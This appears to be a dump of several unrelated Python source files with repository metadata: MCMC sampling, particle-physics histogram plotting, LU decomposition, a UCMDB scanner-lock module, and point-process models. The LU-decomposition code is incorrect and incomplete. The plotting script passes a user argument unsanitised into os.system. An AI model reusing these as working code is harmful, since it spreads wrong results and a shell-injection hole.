p_th = mvn.pdf(th, mean=mu_th, cov=cov_th)
# likelihood (assume std normal distr for now)
p_eps = mvn.pdf(epsilon, mean=mu_eps, cov=cov_eps)
# posterior ~ likelihood * prior
p = p_eps * p_th
return p
'''
proposal algorithm
'''
def propose(self, th_t):
# proposal algorithm, given the current theta_t, propose the next theta
cov = self.model.cov_th / np.power(1.5, 2) # std deviation for the proposal distr
th = mvn.rvs(th_t, cov)
return th
'''
Metropolis-Hastings iterations
'''
def metropolis_hastings(self):
# initial guess & posterior prob
self.th[0] = mvn.rvs(self.model.mu_th, self.model.cov_th)
self.p[0] = self.posterior(self.th[0])
th_t = self.th[0] # current theta, theta_t
p_t = self.p[0] # current p
for i in range(1, self.niter):
if np.mod(i, np.floor(self.niter / 10)) == 1 or (self.niter - i < 10):
print('Iter', i, 'out of', self.niter) # print iteration info
self.th[i] = self.propose(th_t) # propose new sample based on previous
self.p[i] = self.posterior(self.th[i]) # calculate posterior probability
alpha = min([1, self.p[i] / p_t]) if p_t != 0 else 1 if self.p[i] != 0 else 0 # acceptance probability
if np.random.rand() <= alpha: # accept or not
th_t = self.th[i]
p_t = self.p[i]
self.th_mc[i] = th_t
if __name__ == "__main__":
from mcmc_test_cases import testCase
case = 2
noise_level = 0.02
test = testCase(case, noise_level)
th_t = test.th[0]
result_t = test.model.modelFun(test.th[0])
print('Test case:', case)
print('Data:', test.data)
print('Initial guess:', th_t)
print('Result from the guess:', result_t)
print('Error: |data - result| =', np.linalg.norm(test.data - result_t)) | [
"boweiwu@umich.edu"
] | boweiwu@umich.edu |
b8e7bca47b25672de9c3a658279ed59edd3a3dfd | d541f3624379baa43a3f7e4bcfa9c7ea92c38a2f | /NSF_ValidationSuite/compareToReferenceHists.py | fa2fc659869df76d87c7891759491443a63c0e3e | [
"MIT"
] | permissive | ryounsumiko/MAT | c5f032ddb1b6cac0f4d37bb3f7c0d6c3a1e8db42 | 490c2116d9c794b80f2738e8d013785e2d95a6e6 | refs/heads/main | 2023-06-16T19:43:02.137694 | 2021-07-07T21:09:49 | 2021-07-07T21:09:49 | 383,863,078 | 0 | 0 | MIT | 2021-07-07T16:36:23 | 2021-07-07T16:36:22 | null | UTF-8 | Python | false | false | 13,421 | py | ## import common python modules
import ROOT,PlotUtils,os,sys
from argparse import ArgumentParser
## modify $PYTHONPATH to know about custom python modules
PLOTUTILSROOT = os.path.expandvars("$PLOTUTILSROOT")
sys.path.append("{0}/NSF_ValidationSuite/py_classes".format(PLOTUTILSROOT))
## import custom python modules
from plottingClasses import *
from errorMaps import error_bands
## Configure MnvPlotter`
plotter = PlotUtils.MnvPlotter()
# Manually override default error summary groups
plotter.error_summary_group_map.clear()
for group in error_bands:
for error in error_bands[group]:
plotter.error_summary_group_map[group].push_back(error)
## Miscellaneous Plotting prep
plotter.axis_maximum_group = 0.01
##set ROOT to batch mode
ROOT.gROOT.SetBatch()
#Load and implement Phil's plot style header file
ROOT.gROOT.ProcessLine(".L {0}/NSF_ValidationSuite/style/myPlotStyle.h".format(PLOTUTILSROOT))
ROOT.myPlotStyle()
# This helps python and ROOT not fight over deleting something, by stopping ROOT from trying to own the histogram. Thanks, Phil!
# Specifically, w/o this, this script seg faults in the case where I try to instantiate FluxReweighterWithWiggleFit w/ nuE constraint set to False for more than one playlist
ROOT.TH1.AddDirectory(False)
############################################################################################## Preamble above
def produceComparisonPlots(hist_user,hist_reference,histString,lowerBoundX,upperBoundX,horizontalAxisLabel,plotDir):
## Set vertical axis bounds
lowerBoundY = 0.9
upperBoundY = 1.1
# For ratio plots
lineAt1 = ROOT.TLine(lowerBoundX,1,upperBoundX,1)
lineAt1.SetLineColor(ROOT.kRed+1)
lineAt1.SetLineWidth(2)
#############################################################################################################
### Plot CV #################################################################################################
#############################################################################################################
# Pull out CV
cvHist_user = hist_user.GetCVHistoWithStatError()
cvHist_reference = hist_reference.GetCVHistoWithStatError()
with makeEnv_TCanvas('{0}/CV_inclusive_{1}.png'.format(plotDir,histString)):
cvHist_user.SetMarkerColor(ROOT.kRed)
cvHist_user.SetLineColor(ROOT.kRed)
cvHist_user.GetXaxis().SetTitle(horizontalAxisLabel)
cvHist_reference.SetMarkerColor(ROOT.kBlue)
cvHist_reference.SetLineColor(ROOT.kBlue)
cvHist_reference.Draw()
cvHist_user.Draw("same")
hist_ratioCV = cvHist_user.Clone("ratioCV")
hist_ratioCV.Divide(hist_ratioCV,cvHist_reference)
hist_ratioCV.GetYaxis().SetRangeUser(lowerBoundY,upperBoundY)
hist_ratioCV.GetXaxis().SetRangeUser(lowerBoundX,upperBoundX)
hist_ratioCV.GetXaxis().SetTitle(horizontalAxisLabel)
hist_ratioCV.GetYaxis().SetTitle("CV Ratio (user/reference)")
with makeEnv_TCanvas('{0}/CV-Comparison_ratio_inclusive_{1}_user_to_reference.png'.format(plotDir,histString)):
hist_ratioCV.Draw()
lineAt1.Draw()
hist_differenceCV = cvHist_user.Clone("differenceCV")
hist_differenceCV.Add(cvHist_reference,-1)
hist_differenceCV.GetYaxis().SetRangeUser(-5,5)
#hist_differenceCV.GetXaxis().SetRangeUser(lowerBoundX,upperBoundX)
hist_differenceCV.GetXaxis().SetTitle(horizontalAxisLabel)
hist_differenceCV.GetYaxis().SetTitle("CV Difference (user - reference)")
with makeEnv_TCanvas('{0}/CV-Comparison_difference_inclusive_{1}_user_minus_reference.png'.format(plotDir,histString)):
hist_differenceCV.Draw()
with makeEnv_TCanvas('{0}/CV_errorSummary_user.png'.format(plotDir)) as canvas:
hist_user_local = hist_user.Clone("hist_user_local")
hist_user_local.GetXaxis().SetRangeUser(lowerBoundX,upperBoundX)
hist_user_local.GetXaxis().SetTitle("{0} [user]".format(horizontalAxisLabel))
localDrawErrorSummary(plotter,hist_user_local)
with makeEnv_TCanvas('{0}/CV_errorSummary_reference.png'.format(plotDir)):
hist_reference_local = hist_reference.Clone("hist_reference_local")
hist_reference_local.GetXaxis().SetRangeUser(lowerBoundX,upperBoundX)
hist_reference_local.GetXaxis().SetTitle("{0} [reference]".format(horizontalAxisLabel))
localDrawErrorSummary(plotter,hist_reference_local)
#############################################################################################################
### Loop over vertical error bands ##########################################################################
#############################################################################################################
for errorBand in ['Flux',
'GENIE_AGKYxF1pi',
'GENIE_AhtBY',
'GENIE_BhtBY',
'GENIE_CCQEPauliSupViaKF',
'GENIE_CV1uBY',
'GENIE_CV2uBY',
'GENIE_EtaNCEL',
'GENIE_FrAbs_N',
'GENIE_FrAbs_pi',
'GENIE_FrCEx_N',
'GENIE_FrCEx_pi',
'GENIE_FrElas_N',
'GENIE_FrElas_pi',
'GENIE_FrInel_N',
'GENIE_FrPiProd_N',
'GENIE_FrPiProd_pi',
'GENIE_MFP_N',
'GENIE_MFP_pi',
'GENIE_MaCCQEshape',
'GENIE_MaNCEL',
'GENIE_MaRES',
'GENIE_MvRES',
'GENIE_NormCCQE',
'GENIE_NormDISCC',
'GENIE_NormNCRES',
'GENIE_RDecBR1gamma',
'GENIE_Rvn1pi',
'GENIE_Rvn2pi',
'GENIE_Rvp1pi',
'GENIE_Rvp2pi',
'GENIE_Theta_Delta2Npi',
'GENIE_VecFFCCQEshape',
'MINOS_Reconstruction_Efficiency',
'Low_Recoil_2p2h_Tune',
'RPA_HighQ2',
'RPA_LowQ2',
'Muon_Energy_MINERvA',
'Muon_Energy_MINOS',
'Muon_Energy_Resolution',
'BeamAngleX',
'BeamAngleY',
'Proton_Response',
'Pion_Response',
'EM_Response',
'Other_Response'
]:
exec("nUniverses = hist_user.GetVertErrorBand(\"{0}\").GetNHists()".format(errorBand))
#for hist,nameString in [[hist_user,"user"],[hist_reference,"reference"]]:
for hist,nameString in [[hist_reference,"reference"],[hist_user,"user"]]:
# Set hist specs
exec("hist.GetVertErrorBand(\"{0}\").GetXaxis().SetTitle(horizontalAxisLabel)".format(errorBand))
exec("hist.GetVertErrorBand(\"{0}\").GetXaxis().SetRangeUser(lowerBoundX,upperBoundX)".format(errorBand))
# Pull out error bands and save to use in this loop as well as outside of this loop
exec("eb_{0} = hist.GetVertErrorBand(\"{1}\").GetErrorBand(True)".format(nameString,errorBand))
for i in range(nUniverses):
exec("eb{0}_{1} = hist.GetVertErrorBand(\"{2}\").GetHist({0})".format(i,nameString,errorBand))
exec("hist_local = hist.Clone(\"hist_local_{0}\")".format(nameString))
with makeEnv_TCanvas('{0}/errorBand_inclusive_{1}_{2}.png'.format(plotDir,nameString,errorBand)):
exec("hist_local.GetVertErrorBand(\"{0}\").DrawAll(\"\",True)".format(errorBand))
exec("cvHist_local = cvHist_{0}.Clone(\"cvHist_local_{0}\")".format(nameString))
cvHist_local.SetMarkerColor(ROOT.kGreen)
cvHist_local.SetLineColor(ROOT.kGreen)
cvHist_local.Draw("same")
with makeEnv_TCanvas('{0}/errorBand_inclusive_{1}_{2}_fractional.png'.format(plotDir,nameString,errorBand)):
exec("fracEB = hist_local.GetVertErrorBand(\"{0}\").GetErrorBand(True)".format(errorBand))
fracEB.Draw()
exec("hist_local.DivideSingle(hist_local,cvHist_{0})".format(nameString))
hist_local.GetXaxis().SetTitle(horizontalAxisLabel)
hist_local.GetXaxis().SetRangeUser(lowerBoundX,upperBoundX)
hist_local.GetYaxis().SetRangeUser(lowerBoundY,upperBoundY)
with makeEnv_TCanvas('{0}/errorBand_inclusive_ratio_{1}_{2}.png'.format(plotDir,nameString,errorBand)):
hist_local_cv = hist_local.GetCVHistoWithStatError()
hist_local_cv.Draw()
exec("hist_local.GetVertErrorBand(\"{0}\").DrawAll(\"same\",True)".format(errorBand))
hist_ratio = eb_user.Clone("ratio_{0}".format(errorBand))
hist_ratio.Divide(eb_user,eb_reference)
hist_ratio.GetYaxis().SetRangeUser(lowerBoundY,upperBoundY)
with makeEnv_TCanvas('{0}/ratio_inclusive_user_to_reference_{1}.png'.format(plotDir,errorBand)):
hist_ratio.Draw()
for i in range(nUniverses):
exec("hist_ratio_universe{0} = eb{0}_user.Clone(\"ratio_{1}_universe0\")".format(i,errorBand))
exec("hist_ratio_universe{0}.Divide(eb{0}_user,eb{0}_reference)".format(i))
exec("hist_ratio_universe{0}.GetYaxis().SetRangeUser(lowerBoundY,upperBoundY)".format(i))
exec("hist_ratio_universe{0}.GetXaxis().SetRangeUser(lowerBoundX,upperBoundX)".format(i))
with makeEnv_TCanvas('{0}/ratio_inclusive_user_to_reference_{1}_universe{2}.png'.format(plotDir,errorBand,i)):
exec("hist_ratio_universe{0}.Draw()".format(i))
lineAt1.Draw()
def main():
print "I'm inside main!"
#############################################################################################################
### User customizations #####################################################################################
#############################################################################################################
user_Emu_histogram_name = "h_inclusive_Emu"
user_Ptmu_histogram_name = "h_inclusive_Pt"
user_recoil_histogram_name = "h_inclusive_Nu"
#############################################################################################################
### Parse user arguments and set filepaths ##################################################################
#############################################################################################################
## Parse user args
parser = ArgumentParser(description='Process optional inputs')
parser.add_argument('--input', dest='inputFilePath', action='store')
parser.add_argument('--outdir', dest='outDir', action='store')
parser.add_argument('--compare', dest='compareTo', action='store')
parser.add_argument('--refHists', dest='userRefHists', action='store',default='')
OPTS_VEC = parser.parse_args()
## Output directory
plotDir = OPTS_VEC.outDir
if not os.path.isdir(plotDir):
print "Making plot directory {0}".format(plotDir)
os.system( "mkdir %s" % plotDir )
## Reference histograms
if not OPTS_VEC.userRefHists == '': filePath_reference = OPTS_VEC.userRefHists
else:
refDir = '/minerva/data/NSF_Validation/referenceHists/'
if OPTS_VEC.compareTo == 'CCQENu': refFile = 'NSF_MnvGENIEv1_CCQENu_mc_minervame1L_2020-04-17.root'
elif OPTS_VEC.compareTo == 'NukeCC': refFile = 'NSF_MnvGENIEv1_NukeCC_mc_minervame1L_2020-04-17.root'
else:
print "You asked to compare your histograms to reference histograms that don't exist. I'm exiting gracefully."
sys.exit()
filePath_reference = "{0}/{1}".format(refDir,refFile)
## User input histogram file
filePath_user = OPTS_VEC.inputFilePath
#############################################################################################################
### Pull histograms out of input files ######################################################################
#############################################################################################################
histFile_user = ROOT.TFile(filePath_user)
histFile_reference = ROOT.TFile(filePath_reference)
hist_Emu_user = histFile_user.Get(user_Emu_histogram_name)
hist_Ptmu_user = histFile_user.Get(user_Ptmu_histogram_name)
hist_recoil_user = histFile_user.Get(user_recoil_histogram_name)
hist_recoil_user.Rebin(10)
hist_Emu_reference = histFile_reference.Get("h_inclusive_Emu")
hist_Ptmu_reference = histFile_reference.Get("h_inclusive_Pt")
hist_recoil_reference = histFile_reference.Get("h_inclusive_Nu")
hist_recoil_reference.Rebin(10)
for [histString,lowerBoundX,upperBoundX,horizontalAxisLabel] in [['Emu',0,120,"Reconstructed E_{#mu} (GeV)"],
['Ptmu',0,2.5,"Reconstructed P^{T}_{#mu} (GeV)"],
['recoil',0,5000,"Recoil Energy (MeV)"]
]:
exec("hist_user = hist_{0}_user".format(histString))
exec("hist_reference = hist_{0}_reference".format(histString))
## Output subdirectory
plotSubdir = "{0}/{1}".format(plotDir,histString)
if not os.path.isdir(plotSubdir):
print "Making plot directory {0}".format(plotSubdir)
os.system( "mkdir %s" % plotSubdir )
produceComparisonPlots(hist_user,hist_reference,histString,lowerBoundX,upperBoundX,horizontalAxisLabel,plotSubdir)
if __name__ == "__main__":
main()
| [
"andrew@djoinc.com"
] | andrew@djoinc.com |
10ba8b7670ca96c7d6a83e9a4cbb5484f4e95a53 | 446bd1170475e640e4a50476cd80514b0693ee61 | /demo/demo1/demo1/picture/jishe/demo2/Demo3/Demo3/spiders/main.py | 04dfd6ea4f4f2efd572b417bf2be0aa4f5725558 | [] | no_license | HarperHao/python | f040e1e76a243a3dba2b342029a74a45232c1c8d | 4bd807605c0acca57b8eea6444b63d36d758cca9 | refs/heads/master | 2021-07-20T04:40:37.515221 | 2020-10-02T08:58:37 | 2020-10-02T08:58:37 | 219,732,665 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,665 | py | # from scrapy.cmdline import execute
#
# execute("scrapy crawl zuowumianji".split())
import numpy as np
# LU分解
def LU_Decompose(matrix):
rows, columns = np.shape(matrix)
if rows != columns:
print("所输入的矩阵必须是方阵!")
return
L = np.eye(rows)
U = np.triu(matrix) # 先求出U矩阵(化上三角矩阵)
# 求L矩阵(主对角线为1的下三角矩阵)
L[:, 0] = matrix[:, 0] / U[0][0] # L的第一列
for k in range(1, columns - 1): # 从第2列到columns-1列
for i in range(k + 1, rows): # 从第3行到第rows行
sum = 0
for j in range(0, k - 1): # (0,0)不行
x = L[i][j] * U[j][k]
sum = sum + x
L[i][k] = (matrix[i][k] - sum) / U[k][k]
return L, U
# 解LY=b
def solve_equation1(L, b):
columns = np.shape(b)[0]
y = []
y.append(b[0][0]) # y0=b0
for i in range(1, columns): # 求yi
sum = 0
for j in range(i):
sum = sum + L[i][j] * y[j]
y_ = b[i][0] - sum
y.append(y_)
return y
# 解UX=Y
def solve_equation2(U, Y):
columns = np.shape(Y)[0]
X = [i for i in range(columns)] # 先给X初始化
if U[columns - 1] == 0:
X[columns - 1] = Y[columns - 1] / U[columns - 1][columns - 1] # Xcolumns-1=Ycolumns-1/U[columns-1][columns-1]
else:
X[columns - 1] = 0
matrix = np.array([[2, -1, 1],
[4, 1, -1],
[1, 1, 1]])
rows, columns = np.shape(matrix)
L, U = LU_Decompose(matrix)
# b = np.eye(rows)
b = np.array([1, 5, 0]).reshape(3, 1)
# y = solve_equation1(L, b)
print(L, U)
| [
"m19834406344@163.com"
] | m19834406344@163.com |
0ca0daaa2b979abd328191a6168d13b742b6e4f8 | 3637fe729395dac153f7abc3024dcc69e17f4e81 | /reference/ucmdb/discovery/LockUtils.py | d37de20386d6bcca8280da0db434a05d758387e4 | [] | no_license | madmonkyang/cda-record | daced6846c2456f20dddce7f9720602d1583a02a | c431e809e8d0f82e1bca7e3429dd0245560b5680 | refs/heads/master | 2023-06-15T08:16:46.230569 | 2021-07-15T16:27:36 | 2021-07-15T16:27:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,251 | py | #coding=utf-8
import sys
import re
from threading import Event
import time
import logger
import errormessages
import inventoryerrorcodes
import errorobject
from java.lang import System
from java.util import Random
from java.util import HashMap
from com.hp.ucmdb.discovery.library.common import CollectorsParameters
ScannerNodeLock = 'SCANNER_EXCLUSIVE_LOCK'
ScannerNodeSetLock = 'SCANNER_SET_LOCK'
ScannerNodeUnSetLock = 'SCANNER_UNSET_LOCK'
ScannerNodeLockedByCallHome = -1
INVENTORY_JOB_TYPE = 0
CALLHOME_JOB_TYPE = 1
LOCK_AGE_PERIOD_HOURS = 24
LOCK_AGE_PERIOD_MINUTES = LOCK_AGE_PERIOD_HOURS * 60
LOCK_AGE_PERIOD_SECONDS = LOCK_AGE_PERIOD_MINUTES * 60
LOCK_AGE_PERIOD_MILLISECONDS = LOCK_AGE_PERIOD_SECONDS * 1000
#LOCK_PATTERN = probe___job___timeinmillis
OLD_LOCK_PATTERN_DELIMITER = '___'
LOCK_PATTERN_DELIMITER = '\\\\\\___\\\\\\'
LOCK_PATTERN = '%s' + LOCK_PATTERN_DELIMITER + '%s' + LOCK_PATTERN_DELIMITER + '%s' + LOCK_PATTERN_DELIMITER + '%s' + LOCK_PATTERN_DELIMITER + '%s'
LOCK_RELEASE_RETRIES = 10
class Lock:
def __init__(self, probe, jobType, jobId, lockTime, lockExpiration):
self.probe = str(probe)
self.jobType = jobType
self.jobId = str(jobId)
self.lockTime = lockTime
self.lockExpiration = lockExpiration
def isSameLock(self, remoteLock):
logger.debug('Comparing locks.')
logger.debug('This lock:', self.getLockInfo())
logger.debug('Compared lock:', remoteLock.getLockInfo())
return (self.probe == remoteLock.probe) and (self.jobId == remoteLock.jobId) and (self.jobType == remoteLock.jobType)
def isLockExpired(self, compareTime = None):
if compareTime is None:
compareTime = System.currentTimeMillis()
logger.debug('Checking lock expiration. Lock expiration time:', str(self.lockExpiration), ', compare time:', str(compareTime))
return self.lockExpiration < compareTime
def getLockInfo(self):
return LOCK_PATTERN % (str(self.probe), str(self.jobType), str(self.jobId), str(self.lockTime), str(self.lockExpiration))
def printLockInfo(self):
return 'probe ' + self.probe + ', jobType ' + str(self.jobType) + ', jobId' + self.jobId + ', lock time ' + str(self.lockTime) + ', lock expiration ' + str(self.lockExpiration)
def extractLock(lockInfoStr):
logger.debug('Extracting lock from ', str(lockInfoStr))
lockInfo = lockInfoStr.split(LOCK_PATTERN_DELIMITER)
if len(lockInfo) < 5:
lockInfo = lockInfoStr.split(OLD_LOCK_PATTERN_DELIMITER)
if len(lockInfo) < 5:
logger.debug('Invalid lock value, setting lock to be expired')
return Lock('EXPIRED_LOCK', INVENTORY_JOB_TYPE, 'EXPIRED_LOCK', long(0), long(0))
else:
logger.debug('Found old-fasion lock <pre 10.01 version>')
lockProbe = lockInfo[0]
lockJobType = lockInfo[1]
lockJob = lockInfo[2]
lockTime = lockInfo[3]
lockExpirationTime = lockInfo[4]
return Lock(lockProbe, int(lockJobType), lockJob, long(lockTime), long(lockExpirationTime))
def acquireScannerLock(Framework):
client = Framework.getConnectedClient()
probe = CollectorsParameters.getValue(CollectorsParameters.KEY_PROBE_MGR_IP)
if (probe is None) or (len(str(probe)) == 0):
logger.debug('Probe manager ip is not specified in the DiscoveryProbe.properties file, using probe ID')
probe = CollectorsParameters.getValue(CollectorsParameters.KEY_COLLECTORS_PROBE_NAME)
if (probe is None) or (len(str(probe)) == 0):
errorMessage = 'Failed to identify probe name. Lock was not set.'
logger.debug(errorMessage)
Framework.reportError(errorMessage)
Framework.setStepExecutionStatus(WorkflowStepStatus.FATAL_FAILURE)
return
lockTime = System.currentTimeMillis()
lockExpiration = System.currentTimeMillis() + LOCK_AGE_PERIOD_MILLISECONDS
jobId = Framework.getDiscoveryJobId()
jobType = INVENTORY_JOB_TYPE
lock = Lock(probe, jobType, jobId, lockTime, lockExpiration)
lockValue = lock.getLockInfo()
logger.debug('Trying to lock node with value:', lockValue)
existingLock = setNewLockIfExistingLockEmpty(client, lockValue)
if (existingLock is None) or (len(existingLock) == 0):
# lock was acquired
return lockValue
else:
# found existing lock on remote machine
remoteLock = extractLock(existingLock)
logger.debug('Node was already locked:', remoteLock.printLockInfo())
if not remoteLock.isLockExpired():
# the lock is more or less fresh
if lock.isSameLock(remoteLock):
# this is our own lock, just renew it
logger.debug('Found lock of same probe/job pair, renewing lock on the node')
options = HashMap()
options.put(ScannerNodeLock, lockValue)
client.setOptionsMap(options)
return lockValue
# check whether we need to forcefully remove lock, happens in call home based inventory discovery
forceAcquire = Framework.getParameter("IsForceLockAcquire")
if forceAcquire == 'true':
options = HashMap()
options.put(ScannerNodeLock, lockValue)
client.setOptionsMap(options)
return lockValue
# if the remote lock was owned by a call home inventory job, we should cancel the current job
if remoteLock.jobType == CALLHOME_JOB_TYPE:
logger.debug('Remote node was locked by call home inventory job, will cancel the current ' + jobId)
return ScannerNodeLockedByCallHome
logger.debug('Found valid lock is of different job/probe, will try next time')
return None
logger.debug('The found lock is already aged, to be removed')
if not removeLockOption(Framework):
return None
# as there can be another probe / job trying to connect to this node, after removing existing lock
# we don't set our own lock directly (as it can be removed by another probe/job) but go to sleep for some
# time
r = Random()
waitTime = r.nextInt() % 5 + 1
logger.debug('Going to wait for ' + str(waitTime) + ' seconds before retry to lock')
event = Event()
event.wait(waitTime)
existingLock1 = setNewLockIfExistingLockEmpty(client, lockValue)
if (existingLock1 is None) or (len(existingLock1) == 0):
# lock was acquired at last!!!!
return lockValue
# there are other lucky guys
return None
def releaseScannerLock(Framework):
#checking that this destination is the owner of the lock
lockValue = acquireScannerLock(Framework)
if lockValue and (lockValue != ScannerNodeLockedByCallHome):
return removeLockOption(Framework)
else:
logger.debug('Failed to remove lock as lock was already acquired')
return 1
def removeLockOption(Framework):
client = Framework.getConnectedClient()
logger.debug('Removing lock!!!!')
#there is a possibility that during unlock agent options file locked (os lock) by scanner as it is writing here (can be each 10 seconds)
#in this case we can fail to release lock. for this purpose we want to retry here several time - kind of workaround for improper behavior
i = LOCK_RELEASE_RETRIES
lockReleased = client.deleteOption(ScannerNodeLock)
while i > 0 and not lockReleased:
time.sleep(0.1)
logger.debug('Failed to release node lock, going to retry ' + str(i) + ' more times')
lockReleased = client.deleteOption(ScannerNodeLock)
if not lockReleased:
logger.debug('Lock was not released after ' + str(LOCK_RELEASE_RETRIES - i) + ' retries')
else:
logger.debug('Lock was released after ' + str(LOCK_RELEASE_RETRIES - i) + ' retries')
i -= 1
if not lockReleased:
Framework.reportError(inventoryerrorcodes.INVENTORY_DISCOVERY_FAILED_DELETEOPTION, [ScannerNodeLock])
else:
logger.debug('Lock was released after ' + str(LOCK_RELEASE_RETRIES - i) + ' retries')
return lockReleased
#This method serves two scenarios:
#1. On regular workflow each step checks that lock was not removed as expired by other probe/job
#2. On run from particular step tries to aquire lock.
def ensureLock(Framework):
stepName = Framework.getState().getCurrentStepName()
setLock = Framework.getProperty(ScannerNodeSetLock)
if setLock is not None:
logger.debug('Lock was already acquired for workflow, checking that was not removed for step:', stepName)
return checkLock(Framework)
else:
logger.debug('Lock was not acquired before step ', stepName, ', seems like workflow starts from this step, trying to aquire lock')
setNewLock = acquireScannerLock(Framework)
if setNewLock is not None and not setNewLock == ScannerNodeLockedByCallHome:
logger.debug('Lock was acquired with value:', setNewLock)
Framework.setProperty(ScannerNodeSetLock, ScannerNodeSetLock)
Framework.setProperty(ScannerNodeLock, setNewLock)
return setNewLock
def checkLock(Framework):
probe = CollectorsParameters.getValue(CollectorsParameters.KEY_PROBE_MGR_IP)
if (probe is None) or (len(str(probe)) == 0):
logger.debug('Probe manager ip is not specified in the DiscoveryProbe.properties file, using probe ID')
probe = CollectorsParameters.getValue(CollectorsParameters.KEY_COLLECTORS_PROBE_NAME)
jobType = INVENTORY_JOB_TYPE
jobId = Framework.getDiscoveryJobId()
lockTime = System.currentTimeMillis()
lockExpiration = System.currentTimeMillis() + LOCK_AGE_PERIOD_MILLISECONDS
lock = Lock(probe, jobType, jobId, lockTime, lockExpiration)
logger.debug('Checking remote lock with current lock:', str(lock.getLockInfo()))
triggerid = Framework.getTriggerCIData('id')
logger.debug('Checking lock for probe ', probe, ' and jobid ', jobId, ' and triggerid ', triggerid)
client = Framework.getConnectedClient()
options = getClientOptionsMap(client)
lockOption = options.get(ScannerNodeLock)
if (lockOption is None) or (len(lockOption.strip()) == 0):
logger.debug('Lock on scanner node for probe "' + lock.probe + '" and job "' + lock.jobId + '" is not exists')
return 0
remoteLock = extractLock(lockOption)
logger.debug('Found remote lock:', str(remoteLock.getLockInfo()))
if remoteLock.isLockExpired():
logger.debug('Lock on remote node is already expired, renewing lock on the node')
options = HashMap()
options.put(ScannerNodeLock, lock.getLockInfo())
client.setOptionsMap(options)
elif not lock.isSameLock(remoteLock):
logger.debug(
'Lock on remote node is owned by another probe/job (' + remoteLock.probe + '/' + remoteLock.jobId + ')')
if remoteLock.jobType == CALLHOME_JOB_TYPE:
return ScannerNodeLockedByCallHome
return 0
return 1
def setNewLockIfExistingLockEmpty(client, newLock):
existingLock = _getScannerLockValue(client)
if not existingLock:
options = HashMap()
options.put(ScannerNodeLock, newLock)
logger.debug("Set new lock:", newLock)
client.setOptionsMap(options) # double confirm the lock is mine
lockAfterLocked = _getScannerLockValue(client)
if lockAfterLocked != newLock:
logger.debug('The current lock was not the lock just created.')
return lockAfterLocked # the lock doesn't not belong to me
return existingLock
def _getScannerLockValue(client):
options = getClientOptionsMap(client)
if options:
return options.get(ScannerNodeLock)
def getClientOptionsMap(client):
try:
options = client.getOptionsMap()
except:
options = HashMap()
return options | [
"silentbalanceyh@126.com"
] | silentbalanceyh@126.com |
b51e214752df3c3a6aeaa68376a8f788611c9c14 | 7246acf47da67a4ecbc1edd614c8cd881424474b | /text.py | 5d634e4e7a0a8ea447e8decf327291dcfe957537 | [] | no_license | RainingWish/Python-Learning | 15140384c31d94303a6c35beff866252631a8d2c | 6903ee61b3e9f55c9efb7e8ca23d8c50a34dd925 | refs/heads/master | 2020-05-30T18:44:06.721340 | 2019-07-30T19:22:31 | 2019-07-30T19:22:31 | 189,903,917 | 0 | 0 | null | 2019-06-03T00:58:15 | 2019-06-02T23:04:57 | null | UTF-8 | Python | false | false | 324 | py | print('linux basic command')
print('create/edit a file => gedit')
print('move a file => mv')
print('enter a file => cd')
print('exit a file => cd ..' )
print('delet a file => rm')
print('change a file name => mv oldname newname')
print('run a pythin file => python3')
print('create a new folder in linux => mkdir')
| [
"noreply@github.com"
] | RainingWish.noreply@github.com |
9cc804fcf6b650847b0dc7078f440712ad4629c6 | d84bdb13a8ba320d3c6394cf84f5392a9bbefeb8 | /Homework_3/PublickKey.py | 1724c1e1c408e8dfad3482ee50299053d5dbd7ac | [] | no_license | Kygre/CMSI-282 | 0be5251f5db3fcc35afd667f8d8858bf637632c6 | 356a533803a827622b747cd08a4d757169313013 | refs/heads/master | 2021-01-14T12:36:02.903467 | 2015-05-01T01:31:37 | 2015-05-01T01:31:37 | 29,699,625 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 86 | py | '''
Created on Mar 26, 2015
@author: Supreme
'''
if __name__ == '__main__':
pass | [
"kyeboah1@lion.lmu.edu"
] | kyeboah1@lion.lmu.edu |
c1b655ee09ad177d840926d259ab2a963e65a616 | d73bc4f57319440b00578dd8f9b874217d8137c8 | /nfe/experiments/stpp/models/temporal/basic.py | ccbf699376bf1d673c93416a0e8dbf80754455fd | [] | no_license | rular099/neural-flows-experiments | 9643f027a1554029efced29337612b5e6fa33041 | bd19f7c92461e83521e268c1a235ef845a3dd963 | refs/heads/master | 2023-09-05T06:27:17.002620 | 2021-11-24T22:51:13 | 2021-11-24T22:51:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,394 | py | # Copyright (c) Facebook, Inc. and its affiliates.
import abc
import torch
import torch.nn as nn
import torch.nn.functional as F
class TemporalPointProcess(nn.Module):
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def logprob(self, event_times, input_mask, t0, t1):
"""
Args:
event_times: (N, T)
input_mask: (N, T)
t0: (N,) or (1,)
t1: (N,) or (1,)
"""
raise NotImplementedError
class HomogeneousPoissonPointProcess(TemporalPointProcess):
def __init__(self):
super().__init__()
self.lamb = nn.Parameter(torch.randn(1) * 0.2 - 2.0)
def logprob(self, event_times, spatial_locations, input_mask, t0, t1):
lamb = F.softplus(self.lamb)
compensator = (t1 - t0) * lamb
loglik = input_mask.sum(-1) * torch.log(lamb + 1e-20) - compensator
return loglik
class HawkesPointProcess(TemporalPointProcess):
def __init__(self):
super().__init__()
self.mu = nn.Parameter(torch.randn(1) * 0.5 - 2.0)
self.alpha = nn.Parameter(torch.randn(1) * 0.5 - 3.0)
self.beta = nn.Parameter(torch.randn(1) * 0.5)
def logprob(self, event_times, spatial_locations, input_mask, t0, t1):
del spatial_locations
mu = F.softplus(self.mu)
alpha = F.softplus(self.alpha)
beta = F.softplus(self.beta)
dt = event_times[:, :, None] - event_times[:, None] # (N, T, T)
dt = fill_triu(-dt * beta, -1e20)
lamb = torch.exp(torch.logsumexp(dt, dim=-1)) * alpha + mu # (N, T)
loglik = torch.log(lamb + 1e-8).mul(input_mask).sum(-1) # (N,)
log_kernel = -beta * (t1[:, None] - event_times) * input_mask + (1.0 - input_mask) * -1e20
compensator = (t1 - t0) * mu
compensator = compensator - alpha / beta * (torch.exp(torch.logsumexp(log_kernel, dim=-1)) - input_mask.sum(-1))
return loglik - compensator
class SelfCorrectingPointProcess(TemporalPointProcess):
def __init__(self):
super().__init__()
self.mu = nn.Parameter(torch.randn(1) * 0.5 - 2.0)
self.beta = nn.Parameter(torch.randn(1) * 0.5)
def logprob(self, event_times, spatial_locations, input_mask, t0, t1):
del spatial_locations
N, T = event_times.shape
